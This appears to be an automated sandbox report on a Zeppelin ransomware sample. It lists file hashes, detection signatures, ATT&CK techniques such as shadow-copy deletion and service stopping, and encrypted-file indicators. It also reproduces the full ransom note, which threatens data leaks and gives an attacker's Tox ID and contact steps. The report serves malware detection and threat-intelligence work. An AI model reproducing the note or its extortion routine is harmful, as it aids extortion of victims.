zeppelin | 52e8721e17365eb4281908df3ffbe6920ad0da496ec7b6288812e564002801b7

Analysis

max time kernel
118s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
01-08-2023 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
Size

225KB
MD5

3145cd124db5c8c34e053aea87694baa
SHA1

5645f85669b81b82936a821900425046a511dc8d
SHA256

52e8721e17365eb4281908df3ffbe6920ad0da496ec7b6288812e564002801b7
SHA512

a180166e2cc56ec429e7edfee7fbf8e2cbf3ec64190a0270995340ece4047d525d239b8230759bf2f1f17912b6e357c06608c2414658d3cd03edb28c36b006e1
SSDEEP

6144:3SK1AqRHi/EXtw+apQ3an64DQFu/U3buRKlemZ9DnGAeOhYp+c:3osHiGWRpQb4DQFu/U3buRKlemZ9DnGn

Score

10^/10

zeppelin evasion ransomware

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Ransom Note

!!! YOUR FILES HAVE BEEN ENCRYPTED !!! All your files, including documents, databases, and other crucial data, have been encrypted. I've uploaded some databases and important files from your computers to the cloud. You have 48 hours to get in touch with us and reach an agreement. If you don't contact us by the end of this period, I'll release your data publicly on the dark web. This could damage your company and your partners. We're the only ones capable of restoring your files. To prove that we have a functional decryption tool, we're offering you the chance to decrypt one file for free. You can reach out to us through an anonymous chat. Just follow the provided instructions. 1. Visit https://tox.chat/download.html 2. Download and install qTox on your computer. 3. Open it, click "New Profile," and create a new profile. 4. Press the + "Add to friends" button and enter my TOX ID DBA5908245E3067FDA9B0C0D6FEEADC3D3C965A29AC340CA14D539924700DC53948D5F860D7D 5. Click "Send friend request." 6. Keep qTox open and wait. In a few hours, I'll accept your request, and we can begin communicating. Your personal ID: 1F5-33B-521

URLs

https://tox.chat/download.html

Signatures

Detects Zeppelin payload 20 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4200-135-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/2340-146-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-2563-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-3464-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-5692-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-6903-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-11548-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-14498-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-17030-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-18319-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-18320-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-18906-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-21712-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-23022-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-24636-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-25717-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-28958-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-31256-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/5000-32543-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin
behavioral2/memory/4200-32563-0x00000000001F0000-0x0000000000333000-memory.dmp	family_zeppelin

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
ransomware zeppelin
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (6964) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

description	ioc	process
File opened (read-only)	\??\K:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\I:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\H:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\G:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\E:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\B:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\Q:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\L:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\N:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\A:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\Z:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\T:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\V:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\U:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\S:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\R:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\M:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\Y:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\X:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\O:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\J:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\W:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\P:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Drops file in Program Files directory 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-ms	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\hive.xsl.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNBI.TTF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-disabled_32.svg.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\index.win32.bundle	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.scale-200.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail2x.png.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-ppd.xrm-ms.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.White.png.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-es_es_2x.gif	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\ui-strings.js	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Viewpoints\Dark\Cavalier.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\Store.Purchase\Resources\DefaultResourceDictionary.xaml	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\index.txt	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot.cur.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\StoreLogo.contrast-white_scale-100.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\LargeTile.scale-200.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\MixerBranding\mixer_nopic.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\VideoWhatsNewItems.json	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremDemoR_BypassTrial365-ul-oob.xrm-ms	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\sfs_icons.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-oob.xrm-ms.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-100_contrast-black.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSJH.TTC.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xsl	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\wordmui.msi.16.en-us.vreg.dat	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\ui-strings.js	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAB.TTF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppStoreLogo.scale-200.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\security\trusted.libraries	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg4_thumb.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fi_get.svg	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\javafx-src.zip.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-16_altform-lightunplated.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\MedTile.scale-100.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ui-strings.js	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pl_135x40.svg.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\plugin.js	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterRegular.ttf.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionLargeTile.scale-125.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-63.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_whats_new_v2.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1348	sc.exe
2352	sc.exe
4608	sc.exe
3932	sc.exe
1100	sc.exe
5096	sc.exe
5044	sc.exe
4368	sc.exe
4008	sc.exe
2984	sc.exe
4544	sc.exe
5052	sc.exe
4936	sc.exe
972	sc.exe
4596	sc.exe
3092	sc.exe
3516	sc.exe
3100	sc.exe
4980	sc.exe
1472	sc.exe
972	sc.exe
2432	sc.exe
3808	sc.exe
4520	sc.exe
4988	sc.exe
4028	sc.exe
1472	sc.exe
4508	sc.exe
32	sc.exe
1544	sc.exe
4432	sc.exe
2664	sc.exe
2284	sc.exe
4448	sc.exe
2648	sc.exe
1632	sc.exe
4992	sc.exe
352	sc.exe
1392	sc.exe
3344	sc.exe
4448	sc.exe
3848	sc.exe
3016	sc.exe
2276	sc.exe
2712	sc.exe
4568	sc.exe
4440	sc.exe
3632	sc.exe
1416	sc.exe
1324	sc.exe
3016	sc.exe
4988	sc.exe
3092	sc.exe
4296	sc.exe
1116	sc.exe
4120	sc.exe
1596	sc.exe
4848	sc.exe
220	sc.exe
4772	sc.exe
3360	sc.exe
2864	sc.exe
2756	sc.exe
3320	sc.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1848 tasklist.exe
4380 tasklist.exe
1144 tasklist.exe
972 tasklist.exe
2676 tasklist.exe
2532 tasklist.exe

pid	process
1848	tasklist.exe
4380	tasklist.exe
1144	tasklist.exe
972	tasklist.exe
2676	tasklist.exe
2532	tasklist.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2752	taskkill.exe
2692	taskkill.exe
2276	taskkill.exe
2864	taskkill.exe
2876	taskkill.exe
2952	taskkill.exe
3092	taskkill.exe
3004	taskkill.exe
4028	taskkill.exe
520	taskkill.exe
4772	taskkill.exe
316	taskkill.exe
4832	taskkill.exe
3964	taskkill.exe
3436	taskkill.exe
996	taskkill.exe
316	taskkill.exe
3400	taskkill.exe
2696	taskkill.exe
1656	taskkill.exe
3824	taskkill.exe
2380	taskkill.exe
1392	taskkill.exe
4180	taskkill.exe
3468	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

pid	process
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
4200	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2496	WMIC.exe
Token: SeSecurityPrivilege	2496	WMIC.exe
Token: SeTakeOwnershipPrivilege	2496	WMIC.exe
Token: SeLoadDriverPrivilege	2496	WMIC.exe
Token: SeSystemProfilePrivilege	2496	WMIC.exe
Token: SeSystemtimePrivilege	2496	WMIC.exe
Token: SeProfSingleProcessPrivilege	2496	WMIC.exe
Token: SeIncBasePriorityPrivilege	2496	WMIC.exe
Token: SeCreatePagefilePrivilege	2496	WMIC.exe
Token: SeBackupPrivilege	2496	WMIC.exe
Token: SeRestorePrivilege	2496	WMIC.exe
Token: SeShutdownPrivilege	2496	WMIC.exe
Token: SeDebugPrivilege	2496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2496	WMIC.exe
Token: SeRemoteShutdownPrivilege	2496	WMIC.exe
Token: SeUndockPrivilege	2496	WMIC.exe
Token: SeManageVolumePrivilege	2496	WMIC.exe
Token: 33	2496	WMIC.exe
Token: 34	2496	WMIC.exe
Token: 35	2496	WMIC.exe
